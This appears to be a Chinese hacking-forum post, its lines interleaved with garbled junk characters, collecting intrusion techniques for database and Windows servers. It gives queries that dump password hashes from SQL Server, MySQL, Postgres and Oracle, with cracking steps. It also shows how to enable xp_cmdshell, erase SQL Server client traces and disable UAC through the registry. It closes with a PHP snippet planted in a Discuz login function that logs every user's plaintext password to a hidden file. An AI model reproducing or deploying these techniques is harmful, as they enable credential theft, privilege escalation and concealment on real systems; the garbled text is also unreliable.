2 y3 |, n1 x0 S: {9 q$ g;antian365.asp;antian365.jpg* p- f, r: N: D) Z# g1 Y7 j
: D8 L& |$ A5 q7 T s
各种类型数据库抓HASH破解最高权限密码!
. K9 d1 b5 o1 _+ W3 m% q1.sql server2000
. T. q1 v7 { A _) s- N" q/ lSELECT password from master.dbo.sysxlogins where name='sa'
6 |4 r+ Y" X# |0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
/ W6 a; j2 H- N: o+ G% ]* q2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
4 o. ]: a3 K# z0 j
3 X) y% T; T- w; R' @# {% R0×0100- constant header
+ o1 ^7 z0 P7 `( F' N$ ~34767D5C- salt! o: C) H8 @: ~. N# |0 V
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash7 f' _/ S( h, ~3 b' ^( S( u5 ]
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash' ^/ h0 l% I6 j
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
5 M+ {) A3 r o8 M$ p$ CSQL server 2005:-/ ?" ^% j4 _. ?: F2 K! J9 p5 Z" D
SELECT password_hash FROM sys.sql_logins where name='sa'. W [. b- H* ^% f1 K) m x$ G
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
# U( A C n2 Y1 [, q0×0100- constant header
8 i: B0 x& _1 h6 y: `" n+ a7 d993BF231-salt
: A4 H+ W; ^* Z) w1 H5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash4 z* K1 O5 q6 H" m# O- \# y
crack case sensitive hash in cain, try brute force and dictionary based attacks.$ `7 D; _( |7 P8 S
& w6 }9 C+ W" y$ O8 u
update:- following bernardo’s comments:-
5 ?. V) o& f' v) q/ j% r0 Y( Ruse function fn_varbintohexstr() to cast password in a hex string.. N2 i" X1 n0 \! ~" e/ }1 B
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins2 B0 I# W* ~4 A" [! Q
& W1 j& z$ t E% g, ^MYSQL:-
1 b! V/ `4 B/ f7 A" W& ]7 U# O
: q, M4 t8 U" A) ]" i2 p ZIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.. z* b A; {, b2 _5 U. ~
* J* H, S1 K# G9 `* D$ a- a0 j*mysql < 4.1; o$ v' ]! J) r
1 b7 f# y) [; B1 Gmysql> SELECT PASSWORD(‘mypass’);: P ~: w2 i& T3 i3 E* O
+——————–+1 n0 g3 W- @& f, S/ C6 H
| PASSWORD(‘mypass’) |
% P! M1 F* P! V2 z+——————–+
; j2 ^) ]# j ?2 Q# o& j4 Q| 6f8c114b58f2ce9e |6 }9 o9 V2 o/ v! l2 |9 c
+——————–+. t- ~% C2 ~, i) }
* W; L! j) K# u*mysql >=4.1% w( R# ^" A" V0 \! ^* _1 Z7 }8 X
+ K2 z6 Q; V2 d# q+ Y# Cmysql> SELECT PASSWORD(‘mypass’);, `# H) c1 Y8 j$ P0 Y
+——————————————-+
" x; v7 o M- i) [# [| PASSWORD(‘mypass’) |5 c Q* f8 Y4 M {( X4 z; |
+——————————————-+
" z. `6 {9 q* S% K z6 S1 S| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
; Y, W5 h2 U4 o9 ]6 m" P, i+——————————————-+" _( W! f4 J. o5 q* N$ s8 Z
& O2 f. S- z, W- T; k E; oSelect user, password from mysql.user& D. q M5 J4 E5 i
The hashes can be cracked in ‘cain and abel’
# u- {6 e- {# M9 `4 E) l4 P3 }) Z8 L, H# f# ~* {; S
Postgres:-
8 S* T+ I- l* ?9 A3 E* E* pPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
. A0 n7 U' n. h9 X4 {! p0 |select usename, passwd from pg_shadow;
$ J, z, o6 i4 g# `, ^usename | passwd
/ F9 U3 f( g, z4 t; A7 u4 j+ ?——————+————————————-
3 T) A4 f. u. G5 I0 Ntestuser | md5fabb6d7172aadfda4753bf0507ed43960 w* _0 [. r% a3 r- m+ Q
use mdcrack to crack these hashes:-
2 Y/ m! E/ a3 v# u' o$ l' Q- z$ H$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43967 a& r0 z$ Q3 y+ X+ x
" \4 H2 u5 K5 K( t9 C: N. U
Oracle:-0 r# r' ]& x+ @4 Y
select name, password, spare4 from sys.user$
. t: J- B: W+ Dhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g5 F$ b9 r& b# Y6 N4 G
More on Oracle later, i am a bit bored….
/ V% H9 t G6 l( J. x+ A; K
0 L0 K9 p& Y3 k# Y& h) z
) Z* u& I$ c" y. ?0 I) A m/ y+ \在sql server2005/2008中开启xp_cmdshell; k' V7 B& f5 H; E5 ~5 n# M
-- To allow advanced options to be changed.
" T1 U, l) K0 U( R, a& zEXEC sp_configure 'show advanced options', 1
5 K6 x4 t, z' f" p. @GO
2 r: N- o& z& @) ]. r( L' N-- To update the currently configured value for advanced options.( ?( ^* E+ N. q9 K9 u, N
RECONFIGURE* G$ u1 }" V- A; [5 p5 p
GO
4 J* d% r' ?6 k5 r ?-- To enable the feature.; n0 H. ?! g' f$ M: w! R
EXEC sp_configure 'xp_cmdshell', 1
' v# n0 q, l) P L( O! ZGO7 j" Y% V) j; d& l& m
-- To update the currently configured value for this feature.
, S2 N# n( k5 e$ ]0 R* cRECONFIGURE
* N+ P* h$ j1 l3 hGO6 y) O3 E# ]& S* A. t& B6 Q2 R
SQL 2008 server日志清除,在清楚前一定要备份。
5 j# T( N1 ~0 K, u& [9 E如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
) R+ D# X: h4 Y# c( Z/ }X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
8 L6 ]- a/ L: B! ~5 O- T! Y. h
, E& I5 ?/ ~$ _; n6 w. J' q: p对于SQL Server 2008以前的版本:% D$ x* w8 Z% H+ ~7 o0 ]' f% I
SQL Server 2005:
L1 d# ]# f: F t" P3 D* q删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat% L8 R& f0 I- S7 ?* v1 l
SQL Server 2000:( b5 R9 k/ u% {+ o: q/ v# Z
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。5 e. C- {) D2 @6 }" L7 @, a7 ]
1 _" f, e5 s% l
本帖最后由 simeon 于 2013-1-3 09:51 编辑
7 O' p$ P y6 ^$ x% L9 ?) g) g
0 N! h, ^9 D0 {; I- Z- u7 u$ @7 Q: u
windows 2008 文件权限修改# |* Y' P; s& A- g8 w$ U+ n# ^! c5 i. A
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx0 p2 E% X7 L: K
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98' s d( ^2 a& U) _
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
$ I& Z4 `/ E2 P! `/ S- @5 O3 c" X8 c3 m" D% G$ I5 L, F
Windows Registry Editor Version 5.00+ u+ m" [, c! {9 {. Q
[HKEY_CLASSES_ROOT\*\shell\runas]# d9 Q" ^: c; N4 ~( @: I, m' k
@="管理员取得所有权". _1 i' p+ S% k, |% X
"NoWorkingDirectory"="", B. z. f& I5 g4 Z
[HKEY_CLASSES_ROOT\*\shell\runas\command]
$ I4 l$ ?& W( W# ~; [& g@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 l) Y9 w% g$ d; Y. J6 |6 ]"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, ]( {2 c& Y+ \% E, P[HKEY_CLASSES_ROOT\exefile\shell\runas2], D% D: G1 r9 h( E5 h1 m- g2 x
@="管理员取得所有权"
( \6 m" |% [/ n& w k/ Z1 d7 h"NoWorkingDirectory"=""
/ v( T* Y# p0 \; }4 \" H[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]9 E& X5 s6 {+ o- `3 t! y
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
a" _ c, V4 X4 D1 f"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"+ u$ ]# d3 L3 T0 U5 F
/ c& n8 ?* B/ H1 u- y% u. d
[HKEY_CLASSES_ROOT\Directory\shell\runas]& R. |8 z6 H T
@="管理员取得所有权"+ A" d% i$ g2 w& {/ B$ u
"NoWorkingDirectory"=""
4 b& c5 o( a& T6 e+ J[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
- G9 n' p- ^9 r+ \5 ^8 T@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
+ Z e0 I: |) D; Q5 a"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"8 y3 S6 q4 i2 b6 [
9 S1 ^ `+ e( i$ `/ e' ^; ~2 p- ]" [
3 S/ J0 v& O7 K8 @. b; [) ~win7右键“管理员取得所有权”.reg导入8 m; g, e1 X* R- n
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,$ p* \/ }5 |1 _9 w- n6 z
1、C:\Windows这个路径的“notepad.exe”不需要替换2 i9 @# o$ J- M0 m
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
4 F" Z, k6 z) S3 J. b$ t) ?3、四个“notepad.exe.mui”不要管$ K9 @$ h! x) v( a1 [, K0 H3 q
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
7 q7 ^) V. V/ _6 d* G* RC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
9 D" T4 q" {- h) ^1 d7 k; S) P替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,- M6 v5 D1 ^6 u( B
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
! m# l! B& F: ^2 rwindows 2008中关闭安全策略:
( k) T: N- y" q/ l, N% J4 Rreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
t" i# ?" O+ X* C7 c' M3 N }修改uc_client目录下的client.php 在
0 O: H! Q; e" o Ofunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
3 R( I" Q3 h4 Z+ {4 Q9 d下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
6 ?8 T2 |2 a- s- h& |你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw9 {: b0 X( V0 N
if(getenv('HTTP_CLIENT_IP')) {4 ]8 c/ y( ^6 [ V; L/ L
$onlineip = getenv('HTTP_CLIENT_IP');
+ l* ` F1 n$ m; H. i4 D- h} elseif(getenv('HTTP_X_FORWARDED_FOR')) { G6 j0 V/ ~' S5 m# K" X0 O- d; j. _: }" s
$onlineip = getenv('HTTP_X_FORWARDED_FOR');& Z/ d0 _$ _$ [, W
} elseif(getenv('REMOTE_ADDR')) {
( [5 R8 P3 O& L' c/ s2 I$onlineip = getenv('REMOTE_ADDR');
! A, H( c+ Q/ D/ A' H} else {. Q1 C' L" ?( U, s- i! M
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
! o! ~' v: o) [: F/ y t}
; T, J1 y, W( z/ m$ L5 P# ^0 z2 q $showtime=date("Y-m-d H:i:s");
3 Z" X4 v2 P& N% u+ D $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";5 E0 h6 i7 P2 B4 x0 k) U6 }
$handle=fopen('./data/cache/csslog.php','a+');
1 Z! P' ~2 K) ~6 o* b, b $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对